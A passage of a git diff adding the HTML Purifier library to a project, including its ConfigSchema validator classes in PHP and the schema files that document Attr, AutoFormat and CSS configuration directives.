InterchangeBuilder', that means a + * design decision in that class would prevent this validation from + * ever being necessary. We have them anyway, however, for + * redundancy. + */ +class HTMLPurifier_ConfigSchema_Validator +{ + + /** + * Easy to access global objects. + */ + protected $interchange, $aliases; + + /** + * Context-stack to provide easy to read error messages. + */ + protected $context = array(); + + /** + * HTMLPurifier_VarParser to test default's type. + */ + protected $parser; + + public function __construct() { + $this->parser = new HTMLPurifier_VarParser(); + } + + /** + * Validates a fully-formed interchange object. Throws an + * HTMLPurifier_ConfigSchema_Exception if there's a problem. + */ + public function validate($interchange) { + $this->interchange = $interchange; + $this->aliases = array(); + // PHP is a bit lax with integer <=> string conversions in + // arrays, so we don't use the identical !== comparison + foreach ($interchange->directives as $i => $directive) { + $id = $directive->id->toString(); + if ($i != $id) $this->error(false, "Integrity violation: key '$i' does not match internal id '$id'"); + $this->validateDirective($directive); + } + return true; + } + + /** + * Validates a HTMLPurifier_ConfigSchema_Interchange_Id object. + */ + public function validateId($id) { + $id_string = $id->toString(); + $this->context[] = "id '$id_string'"; + if (!$id instanceof HTMLPurifier_ConfigSchema_Interchange_Id) { + // handled by InterchangeBuilder + $this->error(false, 'is not an instance of HTMLPurifier_ConfigSchema_Interchange_Id'); + } + // keys are now unconstrained (we might want to narrow down to A-Za-z0-9.) + // we probably should check that it has at least one namespace + $this->with($id, 'key') + ->assertNotEmpty() + ->assertIsString(); // implicit assertIsString handled by InterchangeBuilder + array_pop($this->context); + } + + /** + * Validates a HTMLPurifier_ConfigSchema_Interchange_Directive object. + */ + public function validateDirective($d) { + $id = $d->id->toString(); + $this->context[] = "directive '$id'"; + $this->validateId($d->id); + + $this->with($d, 'description') + ->assertNotEmpty(); + + // BEGIN - handled by InterchangeBuilder + $this->with($d, 'type') + ->assertNotEmpty(); + $this->with($d, 'typeAllowsNull') + ->assertIsBool(); + try { + // This also tests validity of $d->type + $this->parser->parse($d->default, $d->type, $d->typeAllowsNull); + } catch (HTMLPurifier_VarParserException $e) { + $this->error('default', 'had error: ' . $e->getMessage()); + } + // END - handled by InterchangeBuilder + + if (!is_null($d->allowed) || !empty($d->valueAliases)) { + // allowed and valueAliases require that we be dealing with + // strings, so check for that early. + $d_int = HTMLPurifier_VarParser::$types[$d->type]; + if (!isset(HTMLPurifier_VarParser::$stringTypes[$d_int])) { + $this->error('type', 'must be a string type when used with allowed or value aliases'); + } + } + + $this->validateDirectiveAllowed($d); + $this->validateDirectiveValueAliases($d); + $this->validateDirectiveAliases($d); + + array_pop($this->context); + } + + /** + * Extra validation if $allowed member variable of + * HTMLPurifier_ConfigSchema_Interchange_Directive is defined. + */ + public function validateDirectiveAllowed($d) { + if (is_null($d->allowed)) return; + $this->with($d, 'allowed') + ->assertNotEmpty() + ->assertIsLookup(); // handled by InterchangeBuilder + if (is_string($d->default) && !isset($d->allowed[$d->default])) { + $this->error('default', 'must be an allowed value'); + } + $this->context[] = 'allowed'; + foreach ($d->allowed as $val => $x) { + if (!is_string($val)) $this->error("value $val", 'must be a string'); + } + array_pop($this->context); + } + + /** + * Extra validation if $valueAliases member variable of + * HTMLPurifier_ConfigSchema_Interchange_Directive is defined. + */ + public function validateDirectiveValueAliases($d) { + if (is_null($d->valueAliases)) return; + $this->with($d, 'valueAliases') + ->assertIsArray(); // handled by InterchangeBuilder + $this->context[] = 'valueAliases'; + foreach ($d->valueAliases as $alias => $real) { + if (!is_string($alias)) $this->error("alias $alias", 'must be a string'); + if (!is_string($real)) $this->error("alias target $real from alias '$alias'", 'must be a string'); + if ($alias === $real) { + $this->error("alias '$alias'", "must not be an alias to itself"); + } + } + if (!is_null($d->allowed)) { + foreach ($d->valueAliases as $alias => $real) { + if (isset($d->allowed[$alias])) { + $this->error("alias '$alias'", 'must not be an allowed value'); + } elseif (!isset($d->allowed[$real])) { + $this->error("alias '$alias'", 'must be an alias to an allowed value'); + } + } + } + array_pop($this->context); + } + + /** + * Extra validation if $aliases member variable of + * HTMLPurifier_ConfigSchema_Interchange_Directive is defined. + */ + public function validateDirectiveAliases($d) { + $this->with($d, 'aliases') + ->assertIsArray(); // handled by InterchangeBuilder + $this->context[] = 'aliases'; + foreach ($d->aliases as $alias) { + $this->validateId($alias); + $s = $alias->toString(); + if (isset($this->interchange->directives[$s])) { + $this->error("alias '$s'", 'collides with another directive'); + } + if (isset($this->aliases[$s])) { + $other_directive = $this->aliases[$s]; + $this->error("alias '$s'", "collides with alias for directive '$other_directive'"); + } + $this->aliases[$s] = $d->id->toString(); + } + array_pop($this->context); + } + + // protected helper functions + + /** + * Convenience function for generating HTMLPurifier_ConfigSchema_ValidatorAtom + * for validating simple member variables of objects. + */ + protected function with($obj, $member) { + return new HTMLPurifier_ConfigSchema_ValidatorAtom($this->getFormattedContext(), $obj, $member); + } + + /** + * Emits an error, providing helpful context. + */ + protected function error($target, $msg) { + if ($target !== false) $prefix = ucfirst($target) . ' in ' . $this->getFormattedContext(); + else $prefix = ucfirst($this->getFormattedContext()); + throw new HTMLPurifier_ConfigSchema_Exception(trim($prefix . ' ' . $msg)); + } + + /** + * Returns a formatted context string. + */ + protected function getFormattedContext() { + return implode(' in ', array_reverse($this->context)); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/ValidatorAtom.php b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/ValidatorAtom.php new file mode 100644 index 000000000..b95aea18c --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/ValidatorAtom.php @@ -0,0 +1,66 @@ +<?php + +/** + * Fluent interface for validating the contents of member variables. + * This should be immutable. See HTMLPurifier_ConfigSchema_Validator for + * use-cases. We name this an 'atom' because it's ONLY for validations that + * are independent and usually scalar. + */ +class HTMLPurifier_ConfigSchema_ValidatorAtom +{ + + protected $context, $obj, $member, $contents; + + public function __construct($context, $obj, $member) { + $this->context = $context; + $this->obj = $obj; + $this->member = $member; + $this->contents =& $obj->$member; + } + + public function assertIsString() { + if (!is_string($this->contents)) $this->error('must be a string'); + return $this; + } + + public function assertIsBool() { + if (!is_bool($this->contents)) $this->error('must be a boolean'); + return $this; + } + + public function assertIsArray() { + if (!is_array($this->contents)) $this->error('must be an array'); + return $this; + } + + public function assertNotNull() { + if ($this->contents === null) $this->error('must not be null'); + return $this; + } + + public function assertAlnum() { + $this->assertIsString(); + if (!ctype_alnum($this->contents)) $this->error('must be alphanumeric'); + return $this; + } + + public function assertNotEmpty() { + if (empty($this->contents)) $this->error('must not be empty'); + return $this; + } + + public function assertIsLookup() { + $this->assertIsArray(); + foreach ($this->contents as $v) { + if ($v !== true) $this->error('must be a lookup array'); + } + return $this; + } + + protected function error($msg) { + throw new HTMLPurifier_ConfigSchema_Exception(ucfirst($this->member) . ' in ' . $this->context . ' ' . $msg); + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema.ser b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema.ser Binary files differnew file mode 100644 index 000000000..b106bcf79 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema.ser diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedClasses.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedClasses.txt new file mode 100644 index 000000000..0517fed0a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedClasses.txt @@ -0,0 +1,8 @@ +Attr.AllowedClasses +TYPE: lookup/null +VERSION: 4.0.0 +DEFAULT: null +--DESCRIPTION-- +List of allowed class values in the class attribute. By default, this is null, +which means all classes are allowed. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedFrameTargets.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedFrameTargets.txt new file mode 100644 index 000000000..249edd647 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedFrameTargets.txt @@ -0,0 +1,12 @@ +Attr.AllowedFrameTargets +TYPE: lookup +DEFAULT: array() +--DESCRIPTION-- +Lookup table of all allowed link frame targets. Some commonly used link +targets include _blank, _self, _parent and _top. Values should be +lowercase, as validation will be done in a case-sensitive manner despite +W3C's recommendation. XHTML 1.0 Strict does not permit the target attribute +so this directive will have no effect in that doctype. XHTML 1.1 does not +enable the Target module by default, you will have to manually enable it +(see the module documentation for more details.) +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedRel.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedRel.txt new file mode 100644 index 000000000..9a8fa6a2e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedRel.txt @@ -0,0 +1,9 @@ +Attr.AllowedRel +TYPE: lookup +VERSION: 1.6.0 +DEFAULT: array() +--DESCRIPTION-- +List of allowed forward document relationships in the rel attribute. Common +values may be nofollow or print. By default, this is empty, meaning that no +document relationships are allowed. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedRev.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedRev.txt new file mode 100644 index 000000000..b01788348 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.AllowedRev.txt @@ -0,0 +1,9 @@ +Attr.AllowedRev +TYPE: lookup +VERSION: 1.6.0 +DEFAULT: array() +--DESCRIPTION-- +List of allowed reverse document relationships in the rev attribute. This +attribute is a bit of an edge-case; if you don't know what it is for, stay +away. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.ClassUseCDATA.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.ClassUseCDATA.txt new file mode 100644 index 000000000..e774b823b --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.ClassUseCDATA.txt @@ -0,0 +1,19 @@ +Attr.ClassUseCDATA +TYPE: bool/null +DEFAULT: null +VERSION: 4.0.0 +--DESCRIPTION-- +If null, class will auto-detect the doctype and, if matching XHTML 1.1 or +XHTML 2.0, will use the restrictive NMTOKENS specification of class. Otherwise, +it will use a relaxed CDATA definition. If true, the relaxed CDATA definition +is forced; if false, the NMTOKENS definition is forced. To get behavior +of HTML Purifier prior to 4.0.0, set this directive to false. + +Some rational behind the auto-detection: +in previous versions of HTML Purifier, it was assumed that the form of +class was NMTOKENS, as specified by the XHTML Modularization (representing +XHTML 1.1 and XHTML 2.0). The DTDs for HTML 4.01 and XHTML 1.0, however +specify class as CDATA. HTML 5 effectively defines it as CDATA, but +with the additional constraint that each name should be unique (this is not +explicitly outlined in previous specifications). +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultImageAlt.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultImageAlt.txt new file mode 100644 index 000000000..533165e17 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultImageAlt.txt @@ -0,0 +1,11 @@ +Attr.DefaultImageAlt +TYPE: string/null +DEFAULT: null +VERSION: 3.2.0 +--DESCRIPTION-- +This is the content of the alt tag of an image if the user had not +previously specified an alt attribute. This applies to all images without +a valid alt attribute, as opposed to %Attr.DefaultInvalidImageAlt, which +only applies to invalid images, and overrides in the case of an invalid image. +Default behavior with null is to use the basename of the src tag for the alt. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultInvalidImage.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultInvalidImage.txt new file mode 100644 index 000000000..9eb7e3846 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultInvalidImage.txt @@ -0,0 +1,9 @@ +Attr.DefaultInvalidImage +TYPE: string +DEFAULT: '' +--DESCRIPTION-- +This is the default image an img tag will be pointed to if it does not have +a valid src attribute. In future versions, we may allow the image tag to +be removed completely, but due to design issues, this is not possible right +now. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultInvalidImageAlt.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultInvalidImageAlt.txt new file mode 100644 index 000000000..2f17bf477 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultInvalidImageAlt.txt @@ -0,0 +1,8 @@ +Attr.DefaultInvalidImageAlt +TYPE: string +DEFAULT: 'Invalid image' +--DESCRIPTION-- +This is the content of the alt tag of an invalid image if the user had not +previously specified an alt attribute. It has no effect when the image is +valid but there was no alt attribute present. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultTextDir.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultTextDir.txt new file mode 100644 index 000000000..52654b53a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.DefaultTextDir.txt @@ -0,0 +1,10 @@ +Attr.DefaultTextDir +TYPE: string +DEFAULT: 'ltr' +--DESCRIPTION-- +Defines the default text direction (ltr or rtl) of the document being +parsed. This generally is the same as the value of the dir attribute in +HTML, or ltr if that is not specified. +--ALLOWED-- +'ltr', 'rtl' +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.EnableID.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.EnableID.txt new file mode 100644 index 000000000..6440d2103 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.EnableID.txt @@ -0,0 +1,16 @@ +Attr.EnableID +TYPE: bool +DEFAULT: false +VERSION: 1.2.0 +--DESCRIPTION-- +Allows the ID attribute in HTML. This is disabled by default due to the +fact that without proper configuration user input can easily break the +validation of a webpage by specifying an ID that is already on the +surrounding HTML. If you don't mind throwing caution to the wind, enable +this directive, but I strongly recommend you also consider blacklisting IDs +you use (%Attr.IDBlacklist) or prefixing all user supplied IDs +(%Attr.IDPrefix). When set to true HTML Purifier reverts to the behavior of +pre-1.2.0 versions. +--ALIASES-- +HTML.EnableAttrID +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.ForbiddenClasses.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.ForbiddenClasses.txt new file mode 100644 index 000000000..f31d226f5 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.ForbiddenClasses.txt @@ -0,0 +1,8 @@ +Attr.ForbiddenClasses +TYPE: lookup +VERSION: 4.0.0 +DEFAULT: array() +--DESCRIPTION-- +List of forbidden class values in the class attribute. By default, this is +empty, which means that no classes are forbidden. See also %Attr.AllowedClasses. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDBlacklist.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDBlacklist.txt new file mode 100644 index 000000000..5f2b5e3d2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDBlacklist.txt @@ -0,0 +1,5 @@ +Attr.IDBlacklist +TYPE: list +DEFAULT: array() +DESCRIPTION: Array of IDs not allowed in the document. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDBlacklistRegexp.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDBlacklistRegexp.txt new file mode 100644 index 000000000..6f5824586 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDBlacklistRegexp.txt @@ -0,0 +1,9 @@ +Attr.IDBlacklistRegexp +TYPE: string/null +VERSION: 1.6.0 +DEFAULT: NULL +--DESCRIPTION-- +PCRE regular expression to be matched against all IDs. If the expression is +matches, the ID is rejected. Use this with care: may cause significant +degradation. ID matching is done after all other validation. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDPrefix.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDPrefix.txt new file mode 100644 index 000000000..cc49d43fd --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDPrefix.txt @@ -0,0 +1,12 @@ +Attr.IDPrefix +TYPE: string +VERSION: 1.2.0 +DEFAULT: '' +--DESCRIPTION-- +String to prefix to IDs. If you have no idea what IDs your pages may use, +you may opt to simply add a prefix to all user-submitted ID attributes so +that they are still usable, but will not conflict with core page IDs. +Example: setting the directive to 'user_' will result in a user submitted +'foo' to become 'user_foo' Be sure to set %HTML.EnableAttrID to true +before using this. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDPrefixLocal.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDPrefixLocal.txt new file mode 100644 index 000000000..2c5924a7a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/Attr.IDPrefixLocal.txt @@ -0,0 +1,14 @@ +Attr.IDPrefixLocal +TYPE: string +VERSION: 1.2.0 +DEFAULT: '' +--DESCRIPTION-- +Temporary prefix for IDs used in conjunction with %Attr.IDPrefix. If you +need to allow multiple sets of user content on web page, you may need to +have a seperate prefix that changes with each iteration. This way, +seperately submitted user content displayed on the same page doesn't +clobber each other. Ideal values are unique identifiers for the content it +represents (i.e. the id of the row in the database). Be sure to add a +seperator (like an underscore) at the end. Warning: this directive will +not work unless %Attr.IDPrefix is set to a non-empty value! +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.AutoParagraph.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.AutoParagraph.txt new file mode 100644 index 000000000..d5caa1bb9 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.AutoParagraph.txt @@ -0,0 +1,31 @@ +AutoFormat.AutoParagraph +TYPE: bool +VERSION: 2.0.1 +DEFAULT: false +--DESCRIPTION-- + +<p> + This directive turns on auto-paragraphing, where double newlines are + converted in to paragraphs whenever possible. Auto-paragraphing: +</p> +<ul> + <li>Always applies to inline elements or text in the root node,</li> + <li>Applies to inline elements or text with double newlines in nodes + that allow paragraph tags,</li> + <li>Applies to double newlines in paragraph tags</li> +</ul> +<p> + <code>p</code> tags must be allowed for this directive to take effect. + We do not use <code>br</code> tags for paragraphing, as that is + semantically incorrect. +</p> +<p> + To prevent auto-paragraphing as a content-producer, refrain from using + double-newlines except to specify a new paragraph or in contexts where + it has special meaning (whitespace usually has no meaning except in + tags like <code>pre</code>, so this should not be difficult.) To prevent + the paragraphing of inline text adjacent to block elements, wrap them + in <code>div</code> tags (the behavior is slightly different outside of + the root node.) +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.Custom.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.Custom.txt new file mode 100644 index 000000000..2a476481a --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.Custom.txt @@ -0,0 +1,12 @@ +AutoFormat.Custom +TYPE: list +VERSION: 2.0.1 +DEFAULT: array() +--DESCRIPTION-- + +<p> + This directive can be used to add custom auto-format injectors. + Specify an array of injector names (class name minus the prefix) + or concrete implementations. Injector class must exist. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt new file mode 100644 index 000000000..663064a34 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.DisplayLinkURI.txt @@ -0,0 +1,11 @@ +AutoFormat.DisplayLinkURI +TYPE: bool +VERSION: 3.2.0 +DEFAULT: false +--DESCRIPTION-- +<p> + This directive turns on the in-text display of URIs in <a> tags, and disables + those links. For example, <a href="http://example.com">example</a> becomes + example (<a>http://example.com</a>). +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.Linkify.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.Linkify.txt new file mode 100644 index 000000000..3a48ba960 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.Linkify.txt @@ -0,0 +1,12 @@ +AutoFormat.Linkify +TYPE: bool +VERSION: 2.0.1 +DEFAULT: false +--DESCRIPTION-- + +<p> + This directive turns on linkification, auto-linking http, ftp and + https URLs. <code>a</code> tags with the <code>href</code> attribute + must be allowed. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.PurifierLinkify.DocURL.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.PurifierLinkify.DocURL.txt new file mode 100644 index 000000000..db58b1346 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.PurifierLinkify.DocURL.txt @@ -0,0 +1,12 @@ +AutoFormat.PurifierLinkify.DocURL +TYPE: string +VERSION: 2.0.1 +DEFAULT: '#%s' +ALIASES: AutoFormatParam.PurifierLinkifyDocURL +--DESCRIPTION-- +<p> + Location of configuration documentation to link to, let %s substitute + into the configuration's namespace and directive names sans the percent + sign. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.PurifierLinkify.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.PurifierLinkify.txt new file mode 100644 index 000000000..7996488be --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.PurifierLinkify.txt @@ -0,0 +1,12 @@ +AutoFormat.PurifierLinkify +TYPE: bool +VERSION: 2.0.1 +DEFAULT: false +--DESCRIPTION-- + +<p> + Internal auto-formatter that converts configuration directives in + syntax <a>%Namespace.Directive</a> to links. <code>a</code> tags + with the <code>href</code> attribute must be allowed. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions.txt new file mode 100644 index 000000000..35c393b4e --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions.txt @@ -0,0 +1,11 @@ +AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions +TYPE: lookup +VERSION: 4.0.0 +DEFAULT: array('td' => true, 'th' => true) +--DESCRIPTION-- +<p> + When %AutoFormat.RemoveEmpty and %AutoFormat.RemoveEmpty.RemoveNbsp + are enabled, this directive defines what HTML elements should not be + removede if they have only a non-breaking space in them. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.RemoveNbsp.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.RemoveNbsp.txt new file mode 100644 index 000000000..ca17eb1dc --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.RemoveNbsp.txt @@ -0,0 +1,15 @@ +AutoFormat.RemoveEmpty.RemoveNbsp +TYPE: bool +VERSION: 4.0.0 +DEFAULT: false +--DESCRIPTION-- +<p> + When enabled, HTML Purifier will treat any elements that contain only + non-breaking spaces as well as regular whitespace as empty, and remove + them when %AutoForamt.RemoveEmpty is enabled. +</p> +<p> + See %AutoFormat.RemoveEmpty.RemoveNbsp.Exceptions for a list of elements + that don't have this behavior applied to them. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.txt new file mode 100644 index 000000000..34657ba47 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveEmpty.txt @@ -0,0 +1,46 @@ +AutoFormat.RemoveEmpty +TYPE: bool +VERSION: 3.2.0 +DEFAULT: false +--DESCRIPTION-- +<p> + When enabled, HTML Purifier will attempt to remove empty elements that + contribute no semantic information to the document. The following types + of nodes will be removed: +</p> +<ul><li> + Tags with no attributes and no content, and that are not empty + elements (remove <code><a></a></code> but not + <code><br /></code>), and + </li> + <li> + Tags with no content, except for:<ul> + <li>The <code>colgroup</code> element, or</li> + <li> + Elements with the <code>id</code> or <code>name</code> attribute, + when those attributes are permitted on those elements. + </li> + </ul></li> +</ul> +<p> + Please be very careful when using this functionality; while it may not + seem that empty elements contain useful information, they can alter the + layout of a document given appropriate styling. This directive is most + useful when you are processing machine-generated HTML, please avoid using + it on regular user HTML. +</p> +<p> + Elements that contain only whitespace will be treated as empty. Non-breaking + spaces, however, do not count as whitespace. See + %AutoFormat.RemoveEmpty.RemoveNbsp for alternate behavior. +</p> +<p> + This algorithm is not perfect; you may still notice some empty tags, + particularly if a node had elements, but those elements were later removed + because they were not permitted in that context, or tags that, after + being auto-closed by another tag, where empty. This is for safety reasons + to prevent clever code from breaking validation. The general rule of thumb: + if a tag looked empty on the way in, it will get removed; if HTML Purifier + made it empty, it will stay. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveSpansWithoutAttributes.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveSpansWithoutAttributes.txt new file mode 100644 index 000000000..dde990ab2 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/AutoFormat.RemoveSpansWithoutAttributes.txt @@ -0,0 +1,11 @@ +AutoFormat.RemoveSpansWithoutAttributes +TYPE: bool +VERSION: 4.0.1 +DEFAULT: false +--DESCRIPTION-- +<p> + This directive causes <code>span</code> tags without any attributes + to be removed. It will also remove spans that had all attributes + removed during processing. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowImportant.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowImportant.txt new file mode 100644 index 000000000..b324608f7 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowImportant.txt @@ -0,0 +1,8 @@ +CSS.AllowImportant +TYPE: bool +DEFAULT: false +VERSION: 3.1.0 +--DESCRIPTION-- +This parameter determines whether or not !important cascade modifiers should +be allowed in user CSS. If false, !important will stripped. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowTricky.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowTricky.txt new file mode 100644 index 000000000..748be0eec --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowTricky.txt @@ -0,0 +1,11 @@ +CSS.AllowTricky +TYPE: bool +DEFAULT: false +VERSION: 3.1.0 +--DESCRIPTION-- +This parameter determines whether or not to allow "tricky" CSS properties and +values. Tricky CSS properties/values can drastically modify page layout or +be used for deceptive practices but do not directly constitute a security risk. +For example, <code>display:none;</code> is considered a tricky property that +will only be allowed if this directive is set to true. +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowedFonts.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowedFonts.txt new file mode 100644 index 000000000..3fd465406 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowedFonts.txt @@ -0,0 +1,12 @@ +CSS.AllowedFonts +TYPE: lookup/null +VERSION: 4.3.0 +DEFAULT: NULL +--DESCRIPTION-- +<p> + Allows you to manually specify a set of allowed fonts. If + <code>NULL</code>, all fonts are allowed. This directive + affects generic names (serif, sans-serif, monospace, cursive, + fantasy) as well as specific font families. +</p> +--# vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowedProperties.txt b/lib/htmlpurifier/library/HTMLPurifier/ConfigSchema/schema/CSS.AllowedProperties.txt new file mode 100644 index 000000000..460112ebe --- /dev/null 